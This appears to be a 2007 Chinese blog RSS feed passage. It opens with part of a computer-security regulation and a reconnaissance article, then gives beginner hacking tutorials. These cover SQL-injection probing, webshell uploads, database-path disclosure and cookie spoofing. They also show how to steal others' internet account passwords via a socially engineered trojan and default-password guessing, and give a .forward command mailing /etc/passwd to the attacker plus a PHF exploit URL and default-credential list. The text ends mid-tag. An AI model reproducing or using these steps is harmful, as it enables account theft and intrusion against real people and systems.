<p>　　第九条　计算机信息系统实行安全等级保护。安全等级的划分标准和安全等级保护的具体办法，由公安部会同有关部门制定。</p>
<p>　　第十条　计算机机房应当符合国家标准和国家有关规定。<br />　　 在计算机机房附近施工，不得危害计算机信息系统的安全。</p>
<p>　　第十一条　进行国际联网的计算机信息系统，由计算机信息系统的使用单位报省级以上人民政府公安机关备案。</p>
<p>　　第十二条　运输、携带、邮寄计算机信息媒体进出境的，应当如实向海关申报。</p>
<p>　　第十三条　计算机信息系统的使用单位应当建立健全安全管理制度，负责本单位计算机信息系统的安全保护工作。</p>
<p>　　第十四条　对计算机信息系统中发生的案件，有关使用单位应当在24小时内向当地县级以上人民政府公安机关报告。</p>
<p>　　第十五条　对计算机病毒和危害社会公共安全的其他有害数据的防治研究工作，由公安部归口管理。</p>
<p>　　第十六条　国家对计算机信息系统安全专用产品的销售实行许可证制度。具体办法由公安部会同有关部门制定。<br /><br /></p>
<p><strong>第三章　安全监督<br /></strong>...............................................................................................................</p>
<p>　　第十七条　公安机关对计算机信息系统安全保护工作行使下列监督职权：<br />　　 （一）监督、检查、指导计算信息系统安全保护工作；<br />　　 （二）查处危害计算机信息系统安全的违法犯罪案件；<br />　　 （三）履行计算信息系统安全保护工作的其他监督职责。</p>
<p>　　第十八条　公安机关发现影响计算机信息系统安全的隐患时，应当及时通知使用单位采取安全保护措施。</p>
<p>　　第十九条　公安部在紧急情况下，可以就涉及计算机信息系统安全的特定事项发布专项通令。<br /><br /></p>
<p><strong>第四章　法律责任<br /></strong>...............................................................................................................</p>
<p>　　第二十条　违反本条例的规定，有下列行为之一的，由公安机关处以警告或者停机整顿：<br />　　 （一）违反计算机信息系统安全等级保护制度，危害计算机信息系统安全的；<br />　　 （二）违反计算机信息系统国际联网备案制度的；<br />　　 （三）不按照规定时间报告计算机信息系统中发生的案件的；<br />　　 （四）接到公安机关要求改进安全状况的通知后，在限期内拒不改进的；<br />　　 （五）有危害计算机信息系统安全的其他行为的。</p>
<p>　　第二十一条　计算机机房不符合国家标准和国家其他有关规定的，或者在计算机房附近施工危害计算机信息系统安全的，由公安机关会同有关单位进行处理。</p>
<p>　　第二十二条　运输、携带、邮寄计算机信息媒体进出境，不如实向海关申报的，由海关依照《中华人民共和国海关法》和本条例以及其他有关法律、法规的规定处理。</p>
<p>　　第二十三条　故意输入计算机病毒以及其他有害数据危害计算机信息系统安全的，或者未经许可出售计算机信息系统安全专用产品的，由公安机关处以警告或者对个人处以5000元以下的罚款、对单位处以15000元以下的罚款；有违法所得的，除予以没收外，可以处以违法所得1至3倍的罚款。</p>
<p>　　第二十四条　违反本条例的规定，构成违反治安管理行为的，依照《中华人民共和国治安管理处罚条例》的有关规定处罚；构成犯罪的，依法追究刑事责任。</p>
<p>　　第二十五条　任何组织或者个人违反本条例的规定，给国家、集体或者他人财产造成损失的，应当依法承担民事责任。</p>
<p>　　第二十六条　当事人对公安机关依照本条例所做出的具体行政行为不服的，可以依法申请行政复议或者提起行政诉讼。</p>
<p>　　第二十七条　执行本条例的国家公务员利用职权，索取、收受贿赂或者有其他违法、失职行为，构成犯罪的，依法追究刑事责任；尚不构成犯罪的，给予行政处分。<br /><br /></p>
<p><strong>第五章　附则<br /></strong>...............................................................................................................</p>
<p>　　第二十八条　本条例下列用语的含义：<br />　　 计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。<br />　　 计算机信息系统安全专用产品，是指用于保护计算机信息系统安全的专用硬件和软件产品。</p>
<p>　　第二十九条　军队的计算机信息系统安全保护工作，按照军队的有关法规执行。</p>
<p>　　第三十条　公安部可以根据本条例制定实施办法。</p>
<p>　　第三十一条　本条例自发布之日起实施。</p>]]></description>
		</item>
		    
		
		<item>
			<title>黑客如何查找网络安全漏洞</title>
			<link>http://caipei06.blog.sohu.com/41607135.html</link>
			<comments>http://caipei06.blog.sohu.com/41607135.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Wed, 11 Apr 2007 20:31:26 +0800</pubDate>
			<guid>http://caipei06.blog.sohu.com/41607135.html</guid>
			<description><![CDATA[<span><font size="3">&nbsp; 
<h3><b>黑客如何查找网络安全漏洞</b></h3></font></span>
<p><span><font size="3">电脑黑客们总是希望知道尽可能多的信息，比如:是否联网、内部网络的架构以及</font><a href="http://www.hacker.cn/Get/aqff/index.shtml" target="_blank"><u><font color="#020181" size="3">安全防范</font></u></a><font size="3">措施的状态。一旦那些有经验的黑客盯上了你的网络系统，他们首先会对你的系统进行分析。这就是为什么我们说运用黑客的&ldquo;游戏规则&rdquo;是对付黑客的最好办法的原因。以黑客的眼光来审视网络安全性，往往可以发现很多潜在的安全</font><a href="http://www.hacker.cn/Get/ldfx/index.shtml" target="_blank"><u><font color="#020181" size="3">漏洞</font></u></a><font size="3">。这样做不仅提供了审视你网络系统的不同视角，而且让你能够从你的敌人，即黑客的角度来指导你采取最有效的网络安全措施。 <br /><br />　　下面，我们来看一下网络系统分析的过程。这个过程要用到开源工具和相关技术。 <br /><br />　　<b>用开源工具收集信息</b> <br /><br />　　首先，登录Whois.com网站查找你企业的域名，检索结果将会显示出你的网络系统所使用的DNS</font><a href="http://www.hacker.cn/Get/fwq/index.shtml" target="_blank"><u><font color="#020181" size="3">服务器</font></u></a><font size="3">。然后再使用一些软件工具，如:nslookup，来进一步挖掘DNS</font><a href="http://www.hacker.cn/Get/fwq/index.shtml" target="_blank"><u><font color="#020181" size="3">服务器</font></u></a><font size="3">的详细信息。 <br /><br />　　接下来，需要将目标转向于企业的公众Web站点和你能找到的匿名FTP</font><a href="http://www.hacker.cn/Get/fwq/index.shtml" target="_blank"><u><font color="#020181" size="3">服务器</font></u></a><font size="3">。注意，你现在需要关注的信息主要是:域名、这些域名的IP地址、</font><a href="http://cp.hacker.cn/rqjc.html" target="_blank"><u><font color="#020181" size="3">入侵检测</font></u></a><font size="3">系统的所有信息、用户名、电话号码、电子邮件地址、物理位置、已发布的安全策略、业务合作伙伴的资料、以及新并购企业的信息。 <br /><br />　　此外，在你的上述搜索操作中，一定要特别注意这些网站上已显示的和没有显示的信息。最好，把这些网页存入你的电脑中，然后用记事本程序打开，查看网页的源代码。一般而言，查看网页的源代码可以大量的信息，这也就是某些站点有意对浏览者屏蔽源代码的原因。在源代码文件中，你也许能够了解到网站开发者建站的方式:他们所使用的软 件类型及软件版本、网站以及网页的架构，有时候甚至能够发现一些网站管理员的个人资料。 <br /><br />　　业务合作伙伴的站点或一些新的并购企业的站点往往是黑客入侵的关键点。这些站点是间接入侵目标站点的最佳突破口，容易被网站管理员所忽视，给黑客攻击者制造了大量的机会。如果你在这方面没有足够的警惕性，疏忽大意，很草率地新某个新的业务合作者的网站和你自己的站点联接起来，往往会造成很严重的后果，给你的站点带来极大的安全威胁。在这样的情况下，安全问题比经营问题更加重要，一定要确保安全操作。 <br /><br />　　<b>从外部审视网络</b> <br /><br />　　有了上述信息收集，你可以开始审视你的网络了。你可以运用路径追踪命令来查看你的网络拓扑结构图和访问控制的相关设置。你会获得大量</font><a href="http://www.hacker.cn/Get/lyjh/index.shtml" target="_blank"><u><font color="#020181" size="3">交换</font></u></a><font size="3">机的特征信息，用来旁路访问控制设备。 <br /><br />　　注意，命令的反馈结果会因为所使用</font><a href="http://www.hacker.cn/Get/czxt/index.shtml" target="_blank"><u><font color="#020181" size="3">操作系统</font></u></a><font size="3">的不同而有所差别。UNIX</font><a href="http://www.hacker.cn/Get/czxt/index.shtml" target="_blank"><u><font color="#020181" size="3">操作系统</font></u></a><font size="3">使用UDP，也可以选择使用ICMP;而Windows</font><a href="http://www.hacker.cn/Get/czxt/index.shtml" target="_blank"><u><font color="#020181" size="3">操作系统</font></u></a><font size="3">默认用ICMP来响应请求(Ping)。 <br /><br />　　你也可以用开源工具管理大量ping sweep、执行TCP/UDP协议扫描、</font><a href="http://www.hacker.cn/Get/czxt/index.shtml" target="_blank"><u><font color="#020181" size="3">操作系统</font></u></a><font size="3">探测。这样做的目的就是要了解，在那些外部访问者的眼中，你的网络系统的运行状况和一些基本的面 貌、特征。因此，你需要检验你的网络系统，哪些端口和服务对外部访问者是开放的或可用的，外部访问者是否可以了解到你所使用的</font><a href="http://www.hacker.cn/Get/czxt/index.shtml" target="_blank"><u><font color="#020181" size="3">操作系统</font></u></a><font size="3">和一些程序，极其版本信息。简言 之，就是要了解到你的网络系统究竟对那些外部访问者开放了哪些端口或服务，泄露了哪些站点的基本信息。 <br /><br />　　在你开始上述工作之前，你必须要先获得足够的授权，才能进入整个网络系统并对其进行考察、分析。千万不要将你了解到信息告知那些不怀好意的人。记住:安全防护是一个实 施过程，而不仅仅是一种技术。</font></span></p>]]></description>
		</item>
		    
		
		<item>
			<title>新人零起步接触黑客之网站入侵知识 </title>
			<link>http://caipei06.blog.sohu.com/41607020.html</link>
			<comments>http://caipei06.blog.sohu.com/41607020.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Wed, 11 Apr 2007 20:30:47 +0800</pubDate>
			<category>网络学习</category>
			<guid>http://caipei06.blog.sohu.com/41607020.html</guid>
			<description><![CDATA[<table style="WORD-BREAK: break-all" cellspacing="0" cellpadding="0" align="center" border="0">
<tbody>
<tr valign="center" align="middle">
<td style="WORD-BREAK: break-all" colspan="2" height="50">新人零起步接触黑客之网站入侵知识</td></tr>
<tr valign="center" align="middle">
<td style="WORD-BREAK: break-all" colspan="2"></td></tr>
<tr align="middle">
<td colspan="2">&nbsp;&nbsp;&nbsp;点击数：

 1074&nbsp;&nbsp;&nbsp;&nbsp;更新时间：2006-4-30</td></tr>
<tr>
<td style="WORD-BREAK: break-all" valign="top" colspan="2" height="300">
<table cellspacing="0" cellpadding="10" align="left" border="0">
<tbody>
<tr>
<td><!--插入广告JS代码--></td></tr></tbody></table>
<table cellspacing="1" cellpadding="3" align="center" border="0">
<tbody>
<tr>
<td><font>
<center><font color="#05006c" size="2"></font>&nbsp;</center></font>
<p><font size="2">大家对黑客名词有了一些了解后我们今天来介绍点别的东西，介绍点入侵时常见的名词和一些入侵的方法，好了不废话了下面开始&nbsp;&nbsp; <br />　　首先介绍下什么样的站点可以入侵:必须是动态的网站&nbsp;比如&nbsp;asp&nbsp;php&nbsp;jsp&nbsp;这种形式的站点&nbsp;后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0)&nbsp; <br /><br />　　入侵介绍:&nbsp;1。上传漏洞&nbsp;2。暴库&nbsp;3。注入&nbsp;4。旁注&nbsp;5。COOKIE诈骗&nbsp; <br /><br />　　1:上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。&nbsp; <br /><br />　　怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示&nbsp;上传格式不正确[重新上传]&nbsp;这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL&nbsp; <br /><br />工具介绍:上传工具&nbsp;老兵的上传工具&nbsp;DOMAIN3.5&nbsp;这两个软件都可以达到上传的目的&nbsp;用NC也可以提交&nbsp; <br /><br />　　WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，(这个看管理员的设置了)一般修改别人主页大多都需要这个权限，接触过WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马&nbsp;海阳2006也是&nbsp;WEB木马)我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。[NextPage]&nbsp; <br /><br />2。暴库:这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。&nbsp;&nbsp; <br /><br /><br />　　暴库方法:比如一个站的地址为&nbsp;http://www.xxx.com/dispbbs.asp?boardID=7&amp;ID=161&nbsp;我门就可以把com/dispbbs中间的/换成%5c&nbsp;如果有漏洞直接得到数据库的绝对路径&nbsp;用寻雷什么的下载下来就可以了&nbsp;还有种方法就是利用默认的数据库路径&nbsp;http://www.xxx.com/&nbsp;后面加上&nbsp;conn.asp&nbsp;如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)&nbsp; <br /><br />　　为什么换成%5c:因为在ASCII码里/等于%5c，有时碰到数据库名字为/#abc.mdb的为什么下不了?&nbsp;这里需要把#号换成%23就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把。ASP换成。MDB&nbsp;这样就可以下载了如果还下载不了可能作了防下载。&nbsp; <br /><br />　　3。注入漏洞:这个漏洞是现在应用最广泛，杀伤力也很大的漏洞，可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。&nbsp; <br /><br />　　怎样利用:我先介绍下怎样找漏洞比如这个网址&nbsp;http://www.xxx.com/dispbbs.asp?boardID=7&amp;ID=161&nbsp;后面是以ID=数字形式结尾的站我们可以手动在后面加上个&nbsp;and&nbsp;1=1&nbsp;看看&nbsp;如果显示正常页面&nbsp;再加上个and&nbsp;1=2&nbsp;来看看&nbsp;如果返回正常页面说明没有漏洞&nbsp;如果返回错误页面说明存在注入漏洞。如果加and&nbsp;1=1&nbsp;返回错误页面说明也没有漏洞，知道了站点有没有漏洞我门就可以利用了&nbsp;可以手工来猜解也可以用工具现在工具比较多(NBSI&nbsp;NDSI&nbsp;啊D&nbsp;DOMAIN等)都可以用来猜解帐号密码，因为是菜鸟接触，我还是建议大家用工具，手工比较烦琐。&nbsp; <br /><br />　　4。旁注:我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。打个形象的比喻，&nbsp;比如你和我一个楼&nbsp;我家很安全,而你家呢&nbsp;却漏洞百出&nbsp;现在有个贼想入侵我家&nbsp;他对我家做了监视(也就是扫描)发现没有什么可以利用的东西&nbsp;那么这个贼发现你家和我家一个楼&nbsp;你家很容易就进去了&nbsp;他可以先进入你家&nbsp;然后通过你家得到整个楼的钥匙(系统权限)&nbsp;这样就自然得到我的钥匙了&nbsp;就可以进入我的家(网站)&nbsp; <br /><br />　　工具介绍:还是名小子的DOMIAN3.5不错的东西&nbsp;，可以检测注入&nbsp;可以旁注&nbsp;还可以上传!&nbsp; <br /><br />　　5.COOKIE诈骗:许多人不知道什么是COOKIE，COOKIE是你上网时由网站所为你发送的值记录了你的一些资料，比如IP，姓名什么的。&nbsp; <br /><br />　　怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了&nbsp;但是破解&nbsp;不出来密码&nbsp;(MD5是加密后的一个16位的密码)我们就可以用COOKIE诈骗来实现，把自己的ID修改成管理员的，MD5密码也修改成他的，有工具可以修改COOKIE&nbsp;这样就答到了COOKIE诈骗的目的，系统以为你就是管理员了。&nbsp; <br /><br />　　今天的介绍就到这里了&nbsp;比较基础，都是概念性的东西，所有的都是我的个人理解，如有不正确的地方希望大家指出(个人认为就是&nbsp;为什么换成%5c&nbsp;这里有点问题)。&nbsp;</font></p></td></tr></tbody></table></td></tr></tbody></table>]]></description>
		</item>
		    
		
		<item>
			<title>如何得到别人的上网帐号和密码</title>
			<link>http://caipei06.blog.sohu.com/41606344.html</link>
			<comments>http://caipei06.blog.sohu.com/41606344.html#comment</comments>
			<dc:creator>内COOL</dc:creator>
			<pubDate>Wed, 11 Apr 2007 20:26:54 +0800</pubDate>
			<guid>http://caipei06.blog.sohu.com/41606344.html</guid>
			<description><![CDATA[<table style="WORD-BREAK: break-all" cellspacing="0" cellpadding="0" align="center" border="0">
<tbody>
<tr valign="center" align="middle">
<td style="WORD-BREAK: break-all" colspan="2" height="50">如何得到别人的上网帐号和密码</td></tr>
<tr valign="center" align="middle">
<td style="WORD-BREAK: break-all" colspan="2"></td></tr>
<tr align="middle">
<td colspan="2">作者：未知&nbsp;&nbsp;&nbsp;&nbsp;文章来源：www.520hack.com&nbsp;&nbsp;&nbsp;&nbsp;点击数：

 3255&nbsp;&nbsp;&nbsp;&nbsp;更新时间：2006-3-25</td></tr>
<tr>
<td style="WORD-BREAK: break-all" valign="top" colspan="2" height="300">
<table cellspacing="0" cellpadding="10" align="left" border="0">
<tbody>
<tr>
<td><!--插入广告JS代码--></td></tr></tbody></table>
<p align="center">如何得到别人的上网帐号和密码<br /><br /></p>
<table cellspacing="0" cellpadding="0" align="center" border="0">
<tbody>
<tr>
<td bgcolor="#ffffff">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top">
<table cellspacing="0" cellpadding="0" align="center" border="0">
<tbody>
<tr>
<td bgcolor="#cccccc" height="1"></td></tr>
<tr>
<td valign="top"><br />
<table style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td>

如何得到别人的上网<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>和密码，我在这里介绍几种弱智方法。 <br />&nbsp;&nbsp;&nbsp;&nbsp;方案一：利用特洛伊木马得到<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>。必备工具：NTESPY、PWLVIEW。 <br />&nbsp;&nbsp;&nbsp;&nbsp;优点：只要对方运行了程序就有80%的成功率，而且不需要任何<a href="http://www.3800cc.com/"><font color="#000000">网络</font></a>入侵知识，只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件，一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高，操作简单而且用不了多长时间是它最大的优点，只是...... <br />&nbsp;&nbsp;&nbsp;&nbsp;缺点：只有一个，那就是如何让对方乖乖的运行你的程序。 <br />&nbsp;&nbsp;&nbsp;&nbsp;提示：先问清你的目标和你是不是在一个城市。 <br />&nbsp;&nbsp;&nbsp;&nbsp;实战演戏：一天，我在X海<a href="http://www.3800cc.com/"><font color="#000000">聊天</font></a>室里寻找目标，遇见了同在北京的色鹅丢丢。我上前打招呼：丢丢好呀。丢丢说：你好呀。我又说：XXXXXXX（客套话，先和他拉关系）对了，我拿到了一个新程序，要不要看看？丢丢说：好呀，寄给我吧。 <br />&nbsp;&nbsp;&nbsp;&nbsp;哈哈，鱼上钩了！先把诱饵程序改个名，如改成readme之类的东东，然后和一些不相干的东西发过去，然后你让他先运行README。在这插一句，有一位大侠使用此法时，竟然把控制端程序和NETSPY的说明文件一起发了过去，真搞不懂他怎么想的。我对他说，你先运行README，是中文说明。丢丢说：好...咦，怎么没反映呀？(YEAH!)我又说：那你直接运行软件吧。丢丢说：好吧...不错...我说：明天见...开始干活，连上他的机子后，现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98，进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来，放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车，丢丢的上网<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>和密码就都显示出来了。而且以后如果他上网，NETSPY就会通知你，他就再也逃不出你的手掌心了。就算是他换了密码，你也能在2分钟内再把他搞定。 <br />&nbsp;&nbsp;&nbsp;&nbsp;忠告：你用他的<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。 <br />&nbsp;&nbsp;&nbsp;&nbsp;方案二：利用ISP的疏忽做文章举。例用工具：EMAILCRK或<a href="http://www.3800cc.com/"><font color="#000000">网络</font></a>刺客 <br />&nbsp;&nbsp;&nbsp;&nbsp;优点：没什么优点 <br />&nbsp;&nbsp;&nbsp;&nbsp;缺点：要具体情况具体对待，太麻烦 <br />&nbsp;&nbsp;&nbsp;&nbsp;提示：平时多多留神。 <br />&nbsp;&nbsp;&nbsp;&nbsp;譬如，某个ISP给你开好了<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>，然后又画蛇添足的给你一个邮箱，地址是：你的<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>@xxx.net <br />&nbsp;&nbsp;&nbsp;&nbsp;密码和你的上网密码一样。也就是说，只要你能敲开邮箱的密码就一切OK了。 <br />&nbsp;&nbsp;&nbsp;&nbsp;运行EMAILCRK或<a href="http://www.3800cc.com/"><font color="#000000">网络</font></a>刺客，套上字典后就等着。一般没有XX个小时搞不定，不成功的可能性很大，而且破解时还必须要上网。你的机子要是快可以开上三四个窗口，套上不同的字典一起破 <br />&nbsp;&nbsp;&nbsp;&nbsp;方案三：侵入邮局主机然后把PASS档抓回来，然后用JOHN或JACK套上字典开始破。 <br />&nbsp;&nbsp;&nbsp;&nbsp;优点：一次可以破出好多<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>，而且如果运气好还能拿到ROOT，这个主机就要归你控制了。而且破解时不用上网，可以好几台机子一起破。 <br />&nbsp;&nbsp;&nbsp;&nbsp;缺点：对于初学者有一定困难，尤其是只想拿一个上网<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>这样做恐怕会得不偿失。而且被发现的可能性很大，情节严重且性质恶劣，一定要慎重对待。 <br />&nbsp;&nbsp;&nbsp;&nbsp;由于介绍此类的教学文章比较多，我就不班门弄斧了。 <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;哈哈，我来说说最简单的入侵方法。其实入侵大体的原理相同，主要是利用系统的<a href="http://www.3800cc.com/"><font color="#000000">漏洞</font></a>（BUG）来做文章。 <br />&nbsp;&nbsp;&nbsp;&nbsp;只不过有的网站<a href="http://www.3800cc.com/"><font color="#000000">漏洞</font></a>难找有的好找而已。一个好的<a href="http://www.3800cc.com/"><font color="#000000">黑客</font></a>，就是要能很快的发现<a href="http://www.3800cc.com/"><font color="#000000">漏洞</font></a>并加以利用。下面我给大家举一个小栗子。 <br />&nbsp;&nbsp;&nbsp;&nbsp;有一天，我去XX热线申请主页，发现那里采用的是机器<a href="http://www.3800cc.com/"><font color="#000000">自动</font></a>回信，信的大概格式如下： <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;------------------------------ <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;XXX，你好（XX是你在表格上填的名字） <br />&nbsp;&nbsp;&nbsp;&nbsp;你在XX热线的主页空间已开通 <br />&nbsp;&nbsp;&nbsp;&nbsp;帐户名：XXX 密码：11 <br />&nbsp;&nbsp;&nbsp;&nbsp;-----------XX热线 <br />&nbsp;&nbsp;&nbsp;&nbsp;电话：XXXX-XXXXXXXX <br />&nbsp;&nbsp;&nbsp;&nbsp;------------------------------ <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;好了，由于是机器回信，所以那里所有人的初始密码都是11，而且该热线要更改密码要TELNET到邮局主机去改，有许多网友并没有接触过如何T主机，所以他们使用的还是初始密码11。 <br />&nbsp;&nbsp;&nbsp;&nbsp;开始干活了，打开FTP软件，输入XX热线的IP，密码11，然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看，先试试AAAA，。。。没成功，再换一个，AABB。。。还是不行。哈哈，这个用户名短，没准能行。输入AA。。。进去了。寄下用户名然后继续试，ABC。。。又成功了，看来没改密码的人很多呀。试几个就行了，现在，你已经拥有这些帐户的控制权了。 <br />&nbsp;&nbsp;&nbsp;&nbsp;上面的这个栗子很简单，一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱，而且还未必能成功。即使成功了，你不改它实在无趣，改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句，把这方面的精力放到全心全意为人民<a href="http://www.3800cc.com/"><font color="#000000">服务</font></a>上去。实在不行就去<a href="http://www.3800cc.com/"><font color="#000000">聊天</font></a>室，看谁不听话就炸他，同样很过瘾的！ <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;如何获得第一个<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a> <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;我们这种水平不高的<a href="http://www.3800cc.com/"><font color="#000000">黑客</font></a>入侵都是先得到系统的一个有效<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统<a href="http://www.3800cc.com/"><font color="#000000">漏洞</font></a>还是得到SHADOW都是有一定规律可寻的,通常你到一些<a href="http://www.3800cc.com/"><font color="#000000">黑客</font></a>站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>用ANONYMOUS或是FTP,密码用一个EMAIL<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>放进去,这就是很重要的信息,虽然只有<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x，做一个.foward文件传上去，在UNIX下的命令应该是echo&quot;| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr&quot; &gt; .forward然后给匿名用户写一封信，它会把PASSWD发给你。 <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>,有的网页上甚至列出了EMAIL通讯录,这对<a href="http://www.3800cc.com/"><font color="#000000">黑客</font></a>来讲就是无价之宝.把这些<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>记下来,非常有用. <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-&lt; <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;还可以利用目标的FINGER功能来积累<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了! <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>,例如: <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.3800cc.com/"><font color="#000000">帐号</font></a>　　　　 密码 <br />&nbsp;&nbsp;&nbsp;&nbsp;----------- ---------------- <br />&nbsp;&nbsp;&nbsp;&nbsp;root　　　　root <br />&nbsp;&nbsp;&nbsp;&nbsp;sys　　　 　sys/system/bin <br />&nbsp;&nbsp;&nbsp;&nbsp;bin　　　　 sys/bin <br />&nbsp;&nbsp;&nbsp;&nbsp;mountfsys　 mountfsys <br />&nbsp;&nbsp;&nbsp;&nbsp;adm　　　　 adm <br />&nbsp;&nbsp;&nbsp;&nbsp;uucp　　　　uucp <br />&nbsp;&nbsp;&nbsp;&nbsp;nuucp　　　 anon <br />&nbsp;&nbsp;&nbsp;&nbsp;anon　　　　anon <br />&nbsp;&nbsp;&nbsp;&nbsp;user　　　　user <br />&nbsp;&nbsp;&nbsp;&nbsp;games　　　 games <br />&nbsp;&nbsp;&nbsp;&nbsp;install　　 install <br />&nbsp;&nbsp;&nbsp;&nbsp;reboot　　　给 &quot;command login&quot; 用的 <br />&nbsp;&nbsp;&nbsp;&nbsp;demo　　　　demo <br />&nbsp;&nbsp;&nbsp;&nbsp;umountfsys　umountfsys <br />&nbsp;&nbsp;&nbsp;&nbsp;sync　　　　 sync <br />&nbsp;&nbsp;&nbsp;&nbsp;admin　　　 admin <br />&nbsp;&nbsp;&nbsp;&nbsp;guest　　　 guest <br />&nbsp;&nbsp;&nbsp;&nbsp;daemon　　　daemon <br />&nbsp;&nbsp;&nbsp;&nbsp;________________________________________________________________ <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;有些管理员忘记把他们改掉,那你就发财了! <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;另外还有一些习惯性<a 